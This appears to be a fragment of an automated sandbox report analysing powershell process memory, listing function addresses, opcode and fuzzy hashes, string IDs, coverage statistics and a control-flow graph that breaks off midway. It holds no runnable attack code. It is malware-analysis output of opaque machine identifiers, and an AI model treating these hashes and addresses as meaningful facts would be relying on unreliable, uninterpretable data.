                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 908335e9dbf1d7bd14b2ceacabf2834398a6d497347837b6b9e883e88b2aca47
                                                                                                                            • Instruction ID: e5d92631b857979891b136c09277ed18dd667a8da0e72958587ed702637a86fd
                                                                                                                            • Opcode Fuzzy Hash: 908335e9dbf1d7bd14b2ceacabf2834398a6d497347837b6b9e883e88b2aca47
                                                                                                                            • Instruction Fuzzy Hash: 50210A3190CB4C4FDB58DFAC984A7E97BE0EB96331F04426FD049C3152DA745416CBA1
                                                                                                                            Function 00007FFCCF21F684 Relevance: .1, Instructions: 92COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dd56b016656cc1ef8796347afea50767b60287d5a80f1eeb0ed841eead56bdcd
                                                                                                                            • Instruction ID: 96636d657c1ac31ab61744f4358e0a82c8b66125c0c6340537f82ba95db271fa
                                                                                                                            • Opcode Fuzzy Hash: dd56b016656cc1ef8796347afea50767b60287d5a80f1eeb0ed841eead56bdcd
                                                                                                                            • Instruction Fuzzy Hash: 3B310D3091859D8EFBB49F15CC19BF932D4FF41315F409139D45DC6092CA386D4ACA76
                                                                                                                            Function 00007FFCCF228305 Relevance: .1, Instructions: 82COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: de578e5e5a260d54c8194126c17879b58c33a7663b1ef1ce1817dc369ee0e3d1
                                                                                                                            • Instruction ID: 124bc84432cbfb13016abd242c7f1509da0cbcdd4b7d04534433e0698d3ef36f
                                                                                                                            • Opcode Fuzzy Hash: de578e5e5a260d54c8194126c17879b58c33a7663b1ef1ce1817dc369ee0e3d1
                                                                                                                            • Instruction Fuzzy Hash: 2121E272A0859E4FFB95DB28D8556F877A2EF94300F0400BAD00CDB2C2DE79A982C755
                                                                                                                            Function 00007FFCCF2E27FA Relevance: .1, Instructions: 65COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3143186162.00007FFCCF2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF2E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf2e0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 7c4864927d0f099f3bd0bf05e27335056613cf407ec08469a24047f2185cc395
                                                                                                                            • Instruction ID: 86525c9614085516425f8139faeda03bcaad0b7ea3ee5079dafcc5d8b8a4e8c5
                                                                                                                            • Opcode Fuzzy Hash: 7c4864927d0f099f3bd0bf05e27335056613cf407ec08469a24047f2185cc395
                                                                                                                            • Instruction Fuzzy Hash: CD019622F1EAAE4FE7ADDB285C1527861C1DF94352B6411BAC85FC71D6DD18EC00D2B1
                                                                                                                            Function 00007FFCCF22828D Relevance: .1, Instructions: 55COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e2531a6b329c147fc2fe5c3f0bdd605c736ab44ecc4c4f17d42e57ac035957b5
                                                                                                                            • Instruction ID: 02dbac43e2c3ccef44c208d89bc76ad417425fc54ed6ce9956ecd1e8a12ee10d
                                                                                                                            • Opcode Fuzzy Hash: e2531a6b329c147fc2fe5c3f0bdd605c736ab44ecc4c4f17d42e57ac035957b5
                                                                                                                            • Instruction Fuzzy Hash: 9E01D68544E6DA5EE753AB381C204B27FF4CF9323571856EBE0D8C9093E948594AC366
                                                                                                                            Function 00007FFCCF2137B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                                                            • Instruction ID: a46bd583ddba84e22fa5b92a78603f1965bf4a2b9b28e2107a42b3c7c8f44262
                                                                                                                            • Opcode Fuzzy Hash: 904ddcc0f519508aa89991c4e22db77cdfffe6a81e6581a36432e14cf2a13433
                                                                                                                            • Instruction Fuzzy Hash: 6F01677111CB0D4FDB44EF0CE451AA6B7E0FB95324F50056EE58AC3651D636E882CB46
                                                                                                                            Function 00007FFCCF98062D Relevance: .0, Instructions: 42COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3164411700.00007FFCCF980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF980000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf980000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f58b5b1d15ae0c0ebf19ad8be01bc48b24f2252e2d5b784be8a261611d887efd
                                                                                                                            • Instruction ID: 417b57ebafe586090d2a19272abc394793f9406c82974acf47b3bcabc4b8d098
                                                                                                                            • Opcode Fuzzy Hash: f58b5b1d15ae0c0ebf19ad8be01bc48b24f2252e2d5b784be8a261611d887efd
                                                                                                                            • Instruction Fuzzy Hash: 0BF03C9690DAD94FD34347682C393A02FB09F23114F0E02EBC484CB1A7E80918468362
                                                                                                                            Function 00007FFCCF222E58 Relevance: .0, Instructions: 38COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5abd660cc4d9756afa7762cc38653c5f4ca7192d3ceb3ce9d064ea6598fdb811
                                                                                                                            • Instruction ID: ef8e024e7eca81d5450184ca889eda7d82c4fbd7f7326c661a1e15122cbcb446
                                                                                                                            • Opcode Fuzzy Hash: 5abd660cc4d9756afa7762cc38653c5f4ca7192d3ceb3ce9d064ea6598fdb811
                                                                                                                            • Instruction Fuzzy Hash: BEF0E9308086CD8FDB06DF2888495E57FA0FF26310B05029BE459C71A2DB759498CBE2
                                                                                                                            Function 00007FFCCF98067C Relevance: .0, Instructions: 37COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3164411700.00007FFCCF980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF980000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf980000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1c8f133f947c44e12405cdc9134edb6ab91c80a45238b39dcbbf75ec388c4a24
                                                                                                                            • Instruction ID: 3c9d1bca119d1057c0911031b83458be17319ddea0adb6562215892e06ebf0ba
                                                                                                                            • Opcode Fuzzy Hash: 1c8f133f947c44e12405cdc9134edb6ab91c80a45238b39dcbbf75ec388c4a24
                                                                                                                            • Instruction Fuzzy Hash: D4F0C852E0D9EE4FFFA5AB2C08691646AD0EFA5210B4C01FAD449C71E7E8091C44C361
                                                                                                                            Function 00007FFCCF22588D Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5f662dbe4b2448f42701def6d62c5a74b530d72585888b69915970e619b21e0d
                                                                                                                            • Instruction ID: 8d431fab76cea01d88f50dd8b5899611fb3823836121c4d5be6078827defa560
                                                                                                                            • Opcode Fuzzy Hash: 5f662dbe4b2448f42701def6d62c5a74b530d72585888b69915970e619b21e0d
                                                                                                                            • Instruction Fuzzy Hash: 2DC01233A0C528486608AA88B8030FC6390EA82230A206037D24AC1402EE16212785EA

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFCCF221300 Relevance: 7.2, Strings: 5, Instructions: 932COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: )T_^$*T_^$/T_I$0T_I$3T_I
                                                                                                                            • API String ID: 0-1434597709
                                                                                                                            • Opcode ID: 4c79a3e8e5fd0ab022c8660071988392e3dfbd4d0b04b48742cf2cfd77ab8c04
                                                                                                                            • Instruction ID: ded785adc767004ee76cc6457886ab96f9d98c5308d14e8c36ca5e63116a5314
                                                                                                                            • Opcode Fuzzy Hash: 4c79a3e8e5fd0ab022c8660071988392e3dfbd4d0b04b48742cf2cfd77ab8c04
                                                                                                                            • Instruction Fuzzy Hash: 30520442A0E6D20FF7169F6CB8155F93B91EF8673071901FBE0885B0AFA8549906C3F6
                                                                                                                            Function 00007FFCCF21ED0C Relevance: .4, Instructions: 385COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 772ba30d1160a7cf9d4234b25996cc4cfbf3243254d1d65e862ca67be6ad6b5f
                                                                                                                            • Instruction ID: b4a6a37154af240469165269b13c73ff4111ac578f2954b24fafc533b9f754d8
                                                                                                                            • Opcode Fuzzy Hash: 772ba30d1160a7cf9d4234b25996cc4cfbf3243254d1d65e862ca67be6ad6b5f
                                                                                                                            • Instruction Fuzzy Hash: 51D18430918A8D8FEBA8DF28CC557E977D1FB54310F14822EE84DC7291DB74A945CB91
                                                                                                                            Function 00007FFCCF220F70 Relevance: .4, Instructions: 381COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ee0e2d760dde87dfaefd29dbfc0176a311b3ecc834f6ea1f90d4ce549487b239
                                                                                                                            • Instruction ID: ff907a7e345c09ae02661d6f852e705320d2c59c5527eda4555d973b9f0ce69f
                                                                                                                            • Opcode Fuzzy Hash: ee0e2d760dde87dfaefd29dbfc0176a311b3ecc834f6ea1f90d4ce549487b239
                                                                                                                            • Instruction Fuzzy Hash: 2DC1F882A0E6D60FFB168F2CAC155B66F91EF4732070915FBE4C4570EF9894990AC2F6
                                                                                                                            Function 00007FFCCF226805 Relevance: 17.9, Strings: 14, Instructions: 359COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8C<$(8C<$08C<$88C<$@8C<$H8C<$P8C<$X8C<$`8C<$h8C<$p8C<$x8C<$7C<$7C<
                                                                                                                            • API String ID: 0-3737684791
                                                                                                                            • Opcode ID: e28168a827df82f90606792fc2a3abbb7ad913a4ac17b2245731e1f84038013c
                                                                                                                            • Instruction ID: d8050c04048e9851c94191fd04a701f0f1cd55ddb2a6f0bfbaa34c712bc1343a
                                                                                                                            • Opcode Fuzzy Hash: e28168a827df82f90606792fc2a3abbb7ad913a4ac17b2245731e1f84038013c
                                                                                                                            • Instruction Fuzzy Hash: 2AC18F70B0454A9FEB08E758D495AADB7E2FF9D314F1850B9E008EB387DD64E8428B52
                                                                                                                            Function 00007FFCCF2104E0 Relevance: 8.8, Strings: 7, Instructions: 96COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3141488468.00007FFCCF210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF210000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf210000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (0G,$8,G,$H1G,$P/G,$p@[,$-G,$/G,
                                                                                                                            • API String ID: 0-3623540387
                                                                                                                            • Opcode ID: faacdc7800030b38d953c9eb3510f634622c56db50ccedd945d377ccb94417c5
                                                                                                                            • Instruction ID: 8de794fcfc4efe98aa30e695ffe416d4b40eff7810661736164f8e45226f5f44
                                                                                                                            • Opcode Fuzzy Hash: faacdc7800030b38d953c9eb3510f634622c56db50ccedd945d377ccb94417c5
                                                                                                                            • Instruction Fuzzy Hash: AA215A87C4F9C91FE665CF642C542B6EBB1BB91700B1890B7F49CC61DB9804AE09E375
                                                                                                                            Function 00007FFCCF2E1F3C Relevance: 6.7, Strings: 5, Instructions: 443COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.3143186162.00007FFCCF2E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF2E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffccf2e0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: P+,$P+,$P+,$P+,$xA
                                                                                                                            • API String ID: 0-2401884770
                                                                                                                            • Opcode ID: 355eeeeb8e9805d8b330112f0840fb9daa9daa2eb48c26903f24cc5b7c099437
                                                                                                                            • Instruction ID: c84385791da584f1d6e9b35496ba52fed493211ebec0507d5ea7c92dcf56fe51
                                                                                                                            • Opcode Fuzzy Hash: 355eeeeb8e9805d8b330112f0840fb9daa9daa2eb48c26903f24cc5b7c099437
                                                                                                                            • Instruction Fuzzy Hash: 99D1CF32E09A9D4FEB98EF1888556B877D1EF98321F25117AD44EC71D2CA24E841C7A1

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFCCF11EB1A Relevance: .2, Instructions: 162COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2979094240.00007FFCCF11D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF11D000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_7ffccf11d000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a4a1c612c97d0bfe93931211c841f3f724d8e0ac3f956c22c5b74426c952f404
                                                                                                                            • Instruction ID: ab8520b433c0212dc26b23046469b4a9a2f097802fa0a3ee0c2fce1177cb4e53
                                                                                                                            • Opcode Fuzzy Hash: a4a1c612c97d0bfe93931211c841f3f724d8e0ac3f956c22c5b74426c952f404
                                                                                                                            • Instruction Fuzzy Hash: 4051F27140DBC88FE756DF2898859623FF0EFA6350B1445AFE089CB1A3D625E845C762
                                                                                                                            Function 00007FFCCF233C85 Relevance: .0, Instructions: 49COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2979647603.00007FFCCF230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF230000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_7ffccf230000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 96623b4c4b41cdee925f0179e7dcfd3c423de3dd873a66672c5513d21642538e
                                                                                                                            • Instruction ID: 943bba9d5890289972295c009ecc9da46926930eb01c2d86c095891629706026
                                                                                                                            • Opcode Fuzzy Hash: 96623b4c4b41cdee925f0179e7dcfd3c423de3dd873a66672c5513d21642538e
                                                                                                                            • Instruction Fuzzy Hash: C001677111CB0C4FD748EF0CE451AA5B7E0FB95324F50056EE58AC3651D636E881CB45

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:3.2%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:3
                                                                                                                            Total number of Limit Nodes:0
                                                                                                                            execution_graph 12509 7ffccf22e674 12510 7ffccf22e67d LoadLibraryExW 12509->12510 12512 7ffccf22e72d 12510->12512

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFCCF2F309E Relevance: 24.8, Strings: 19, Instructions: 1083COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 7ffccf2f309e-7ffccf2f30a8 1 7ffccf2f30a9-7ffccf2f30b1 0->1 2 7ffccf2f31d1-7ffccf2f326c 0->2 3 7ffccf2f30fb-7ffccf2f3113 1->3 4 7ffccf2f30b2-7ffccf2f30b8 1->4 12 7ffccf2f3115-7ffccf2f315c 3->12 7 7ffccf2f30ba-7ffccf2f30d5 4->7 8 7ffccf2f30d7-7ffccf2f30e3 4->8 7->8 8->2 10 7ffccf2f30e9-7ffccf2f30f6 8->10 11 7ffccf2f30f8-7ffccf2f30f9 10->11 10->12 11->3 24 7ffccf2f315e-7ffccf2f3171 12->24 26 7ffccf2f3178-7ffccf2f317b 24->26 27 7ffccf2f28b9-7ffccf2f28c5 26->27 28 7ffccf2f3181-7ffccf2f3195 26->28 27->2 29 7ffccf2f28cb-7ffccf2f28d8 27->29 28->27 31 7ffccf2f28da-7ffccf2f28e7 29->31 32 7ffccf2f28f1-7ffccf2f290b 29->32 31->32 37 7ffccf2f28e9-7ffccf2f28ef 31->37 34 7ffccf2f294a-7ffccf2f2956 32->34 35 7ffccf2f290d-7ffccf2f2942 32->35 34->2 36 7ffccf2f295c-7ffccf2f2969 34->36 35->34 39 7ffccf2f296b-7ffccf2f2980 36->39 40 7ffccf2f2982-7ffccf2f2992 36->40 37->32 39->40 40->2 43 7ffccf2f2998-7ffccf2f29a2 40->43 46 7ffccf2f29bb-7ffccf2f29c7 43->46 47 7ffccf2f29a4-7ffccf2f29b9 43->47 46->2 50 7ffccf2f29cd-7ffccf2f29d7 46->50 47->46 51 7ffccf2f29d9-7ffccf2f29e7 50->51 52 7ffccf2f29f1-7ffccf2f2a38 50->52 51->52 56 7ffccf2f29e9-7ffccf2f29ef 51->56 52->2 61 7ffccf2f2a3e-7ffccf2f2a4b 52->61 56->52 62 7ffccf2f2a65-7ffccf2f2a76 61->62 63 7ffccf2f2a4d-7ffccf2f2a5b 61->63 62->2 64 7ffccf2f2a7c-7ffccf2f2a86 62->64 63->62 68 7ffccf2f2a5d-7ffccf2f2a63 63->68 66 7ffccf2f2a88-7ffccf2f2aa1 64->66 67 7ffccf2f2aa4-7ffccf2f2ab0 64->67 66->67 67->2 70 7ffccf2f2ab6-7ffccf2f2ac0 67->70 68->62 71 7ffccf2f319a-7ffccf2f319f 70->71 72 7ffccf2f2ac6-7ffccf2f2adb 70->72 75 7ffccf2f31a7-7ffccf2f31bc 71->75 76 7ffccf2f2ae6-7ffccf2f2b57 72->76 77 7ffccf2f2add-7ffccf2f2ae3 72->77 76->75 86 7ffccf2f2b5d-7ffccf2f2ba6 76->86 77->76 91 7ffccf2f2ba8-7ffccf2f2be5 86->91 92 7ffccf2f2bec-7ffccf2f2bfb 86->92 91->92 94 7ffccf2f2be7 92->94 95 7ffccf2f2bfd-7ffccf2f2c0a 92->95 94->92 97 7ffccf2f2c23-7ffccf2f2c2e 95->97 98 7ffccf2f2c0c-7ffccf2f2c21 95->98 97->94 100 7ffccf2f2c30-7ffccf2f2c3d 97->100 98->97 101 7ffccf2f2c56-7ffccf2f2c61 100->101 102 7ffccf2f2c3f-7ffccf2f2c4c 100->102 101->94 105 7ffccf2f2c63-7ffccf2f2c6d 101->105 102->101 107 7ffccf2f2c4e-7ffccf2f2c54 102->107 109 7ffccf2f2c87-7ffccf2f2c8b 105->109 110 7ffccf2f2c6f-7ffccf2f2c7d 105->110 107->101 109->94 112 7ffccf2f2c91-7ffccf2f2c9b 109->112 110->109 114 7ffccf2f2c7f-7ffccf2f2c85 110->114 115 7ffccf2f2cb4-7ffccf2f2cfb 112->115 116 7ffccf2f2c9d-7ffccf2f2caa 112->116 114->109 115->94 125 7ffccf2f2d01-7ffccf2f2d0b 115->125 116->115 119 7ffccf2f2cac-7ffccf2f2cb2 116->119 119->115 126 7ffccf2f2d25-7ffccf2f2d31 125->126 127 7ffccf2f2d0d-7ffccf2f2d1b 125->127 126->94 128 7ffccf2f2d37-7ffccf2f2d41 126->128 127->126 132 7ffccf2f2d1d-7ffccf2f2d23 127->132 130 7ffccf2f2d5b-7ffccf2f2dcc 128->130 131 7ffccf2f2d43-7ffccf2f2d59 128->131 130->94 141 7ffccf2f2dd2-7ffccf2f2ddf 130->141 131->130 132->126 142 7ffccf2f2df8-7ffccf2f2e08 141->142 143 7ffccf2f2de1-7ffccf2f2df6 141->143 142->94 145 7ffccf2f2e0e-7ffccf2f2e18 142->145 143->142 146 7ffccf2f2e1a-7ffccf2f2e27 145->146 147 7ffccf2f2e31-7ffccf2f2e3d 145->147 146->147 151 7ffccf2f2e29-7ffccf2f2e2f 146->151 147->94 150 7ffccf2f2e43-7ffccf2f2e4d 147->150 152 7ffccf2f2e66-7ffccf2f2ead 150->152 153 7ffccf2f2e4f-7ffccf2f2e64 150->153 151->147 152->94 161 7ffccf2f2eb3-7ffccf2f2ebd 152->161 153->152 162 7ffccf2f2ed6-7ffccf2f2ee2 161->162 163 7ffccf2f2ebf-7ffccf2f2ed4 161->163 162->94 165 7ffccf2f2ee8-7ffccf2f2ef2 162->165 163->162 166 7ffccf2f2ef4-7ffccf2f2f10 165->166 167 7ffccf2f2f12-7ffccf2f2f78 165->167 166->167 178 7ffccf2f2f7a-7ffccf2f2fac 167->178 179 7ffccf2f2fcf-7ffccf2f2fe3 167->179 183 7ffccf2f2feb-7ffccf2f2ff7 178->183 184 7ffccf2f2fae-7ffccf2f2fce 178->184 179->183 183->2 186 7ffccf2f2ffd-7ffccf2f3007 183->186 184->179 188 7ffccf2f3009-7ffccf2f3024 186->188 189 7ffccf2f3026-7ffccf2f3032 186->189 188->189 189->2 190 7ffccf2f3038-7ffccf2f3042 189->190 192 7ffccf2f3044-7ffccf2f305f 190->192 193 7ffccf2f3061-7ffccf2f309d 190->193 192->193 193->0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000A.00000002.3754334771.00007FFCCF2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCCF2F0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_10_2_7ffccf2f0000_powershell.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (}K$(}K$(}K$(}K$(}K$(}K$(}K$H|K$H|K$H|K$H|K$H|K$H|K$H|K$H|K$`bK$`bK$p!G$xA
                                                                                                                            • API String ID: 0-159033697
                                                                                                                            • Opcode ID: 677e29b8d088305ec55fcafd1b5bf1c5d4633dd7be7364115feacc015ecfa361
                                                                                                                            • Instruction ID: 037e94b77df74675335cd0c52eb1b3c1a80facb7c06681b581f6f91d5bf65431
                                                                                                                            • Opcode Fuzzy Hash: 677e29b8d088305ec55fcafd1b5bf1c5d4633dd7be7364115feacc015ecfa361
                                                                                                                            • Instruction Fuzzy Hash: 1072E231A2DAAD4FEB95EF18886566877E1EF96300B5801BEC44DC71C3DA25EC42C7A1
                                                                                                                            Function 00007FFCCF75221C Relevance: 4.6, Strings: 3, Instructions: 814COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 392 7ffccf75221c-7ffccf752242 394 7ffccf752213-7ffccf75221a 392->394 395 7ffccf752244-7ffccf75224a 392->395 396 7ffccf75221b 394->396 395->396 398 7ffccf75224c-7ffccf752279 395->398 400 7ffccf75227f-7ffccf752289 398->400 401 7ffccf752905-7ffccf75299a 398->401 402 7ffccf7522a2-7ffccf7522aa 400->402 403 7ffccf75228b-7ffccf7522a0 400->403 402->401 406 7ffccf7522b0-7ffccf7522ba 402->406 403->402 407 7ffccf7522d3-7ffccf7522db 406->407 408 7ffccf7522bc-7ffccf7522d1 406->408 407->401 410 7ffccf7522e1-7ffccf7522eb 407->410 408->407 413 7ffccf7522ed-7ffccf7522fa 410->413 414 7ffccf752304-7ffccf752305 410->414 413->414 420 7ffccf7522fc-7ffccf752302 413->420 418 7ffccf752308-7ffccf752314 414->418 418->401 421 7ffccf75231a-7ffccf752324 418->421 420->414 423 7ffccf75233d-7ffccf752357 421->423 424 7ffccf752326-7ffccf752333 421->424 426 7ffccf752359-7ffccf75238e 423->426 427 7ffccf752396-7ffccf7523a2 423->427 424->423 432 7ffccf752335-7ffccf75233b 424->432 426->427 427->401 431 7ffccf7523a8-7ffccf7523b2 427->431 435 7ffccf7523cb-7ffccf75240f 431->435 436 7ffccf7523b4-7ffccf7523c9 431->436 432->423 435->401 444 7ffccf752415-7ffccf75241f 435->444 436->435 445 7ffccf752421-7ffccf75242f 444->445 446 7ffccf752439-7ffccf7524a5 444->446 445->446 449 7ffccf752431-7ffccf752437 445->449 457 7ffccf7528df-7ffccf7528f2 446->457 458 7ffccf7524ab-7ffccf7524f4 446->458 449->446 463 7ffccf75253a-7ffccf752546 458->463 464 7ffccf7524f6-7ffccf752533 458->464 465 7ffccf752548-7ffccf752552 463->465 466 7ffccf752535 463->466 464->463 468 7ffccf75256b-7ffccf75257b 465->468 469 7ffccf752554-7ffccf752561 465->469 466->463 468->466 473 7ffccf75257d-7ffccf752587 468->473 469->468 476 7ffccf752563-7ffccf752569 469->476 474 7ffccf7525a0-7ffccf752671 473->474 475 7ffccf752589-7ffccf75259e 473->475 474->466 493 7ffccf752677-7ffccf752681 474->493 475->474 476->468 494 7ffccf752683-7ffccf752698 493->494 495 7ffccf75269a-7ffccf75272e 493->495 494->495 508 7ffccf752730-7ffccf75274c 495->508 509 7ffccf752785-7ffccf752789 495->509 512 7ffccf75274d-7ffccf752762 508->512 509->512 513 7ffccf75278b-7ffccf752799 509->513 515 7ffccf7527a1-7ffccf7527e1 512->515 516 7ffccf752764-7ffccf752784 512->516 513->515 